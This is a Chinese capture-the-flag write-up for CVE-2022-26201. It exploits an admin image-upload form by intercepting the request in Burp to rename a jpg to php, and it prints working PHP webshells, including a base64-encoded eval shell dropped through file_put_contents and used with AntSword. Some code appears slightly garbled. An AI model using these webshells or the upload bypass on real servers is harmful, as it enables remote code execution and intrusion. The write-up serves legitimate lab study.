CVE-2022-26201

打开是这么个页面

左上角找到Admin访问

里面有个Add Users,访问一下,能创建用户,有个能上传图片的地方

普通的一句话木马无法访问flag,需要创建一个权限马

<?php system($_GET1);phpinfo();?>

因为只能上传jpg形式的文件,所以更改文件后缀名为jpg

使用bp抓包,更改后缀为php,使用重放器发送

上传成功

访问img/上传的php文件名 /flag,得到flag:flag{a71683b4-9a2d-4288-b8f3-25d10816b1c0}

第二种方法使用蚁剑马连接

一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:

base64先对一句话木马加密<?php @eval($_POST'a');?>

木马内容:

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'));

?>

然后跟上边一样bp抓包改包,重放器发送

生成shell.php文件,木马是以base64的形式。

蚁剑路径为img/shell.php,编码器为base6,根目录下找到flag

相关推荐
湮w2 小时前
JavaWeb(三)JavaScript详细讲解
java·javascript·web
还是鼠鼠1 天前
AI掘金头条新闻系统 (Toutiao News)-缓存相关推荐新闻
后端·python·mysql·fastapi·web
曲幽1 天前
从卡顿到丝滑:FastAPI 调用外部 API 的正确姿势(httpx 实战)
python·fastapi·web·async·httpx·client·await·requests·aiohttp
还是鼠鼠4 天前
AI掘金头条新闻系统 (Toutiao News)-缓存新闻详情
后端·python·mysql·fastapi·web
曲幽10 天前
你的REST接口还在“过度投喂”数据吗?——FastAPI + GraphQL实战避坑指南
python·fastapi·web·graphql·route·cors·rest·strawberry
带刺的坐椅12 天前
Spring Boot → Solon 注解迁移实战指南:一张对照表说清楚
java·springboot·web·solon
曲幽16 天前
刚部署的 LibreTranslate 频频翻车?我掏出了 20 年前的 StarDict 词典,用 FastAPI 搭了个本地词典翻译 API
python·fastapi·web·translate·goldendict·libretranslate·stardict·pystardict
曲幽17 天前
别再用网页翻译看源码了!你的私人翻译神器LibreTranslate,部署避坑指南来了
python·docker·web·pot·translate·libretranslate·arogstranslate
llz_11223 天前
web-第四次课后作业
前端·spring boot·web
天山@12324 天前
电商系统Web渗透测试实战学习笔记
web·电商系统